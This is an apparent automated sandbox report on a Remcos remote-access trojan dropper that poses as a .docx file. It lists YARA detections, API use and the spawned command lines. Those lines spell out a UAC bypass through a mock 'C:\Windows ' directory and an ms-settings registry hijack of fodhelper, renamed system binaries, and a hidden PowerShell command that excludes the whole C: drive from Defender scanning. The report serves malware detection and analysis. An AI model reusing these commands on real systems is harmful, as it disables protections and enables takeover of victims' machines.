              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04581E65 appears 34 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06422B14 appears 34 times
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 04582093 appears 50 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: String function: 0298480C appears 865 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: String function: 02997CC8 appears 49 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: String function: 029844AC appears 69 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: String function: 02997E14 appears 45 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: String function: 029846A4 appears 242 times
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: String function: 02986650 appears 37 times
              Source: C:\Users\Public\ger.exeCode function: String function: 00007FF7E0A0D3D0 appears 56 times
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeBinary or memory string: OriginalFilename vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@53/21@51/1
              Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF64B5632B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,8_2_00007FF64B5632B0
              Source: C:\Users\Public\ger.exeCode function: 24_2_00007FF7E0A03F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,24_2_00007FF7E0A03F5C
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_04597952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,31_2_04597952
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02987F62 GetDiskFreeSpaceA,0_2_02987F62
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_0299A174 CreateToolhelp32Snapshot,0_2_0299A174
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeCode function: 0_2_02996D58 CoCreateInstance,0_2_02996D58
              Source: C:\Users\Public\Libraries\drbdmeyP.pifCode function: 3_2_004026B8 LoadResource,SizeofResource,FreeResource,3_2_004026B8
              Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 31_2_0459AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,31_2_0459AC78
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
              Source: C:\Windows\SysWOW64\colorcpl.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3
              Source: C:\Users\Public\xkn.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2936:120:WilError_03
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile created: C:\Users\user\AppData\Local\Temp\D2F6.tmpJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
              Source: C:\Users\Public\Libraries\drbdmeyP.pifFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeReversingLabs: Detection: 44%
              Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeVirustotal: Detection: 50%
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeFile read: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe"
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pif
              Source: C:\Users\Public\Libraries\drbdmeyP.pifProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIF
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: unknownProcess created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess created: C:\Users\Public\Libraries\drbdmeyP.pif C:\Users\Public\Libraries\drbdmeyP.pifJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe C:\\Users\\Public\\Libraries\\Pyemdbrd.PIFJump to behavior
              Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
              Source: C:\Users\Public\Libraries\drbdmeyP.pifProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D2F6.tmp\D2F7.tmp\D2F8.bat C:\Users\Public\Libraries\drbdmeyP.pif"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c ping 127.0.0.1 -n 2Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
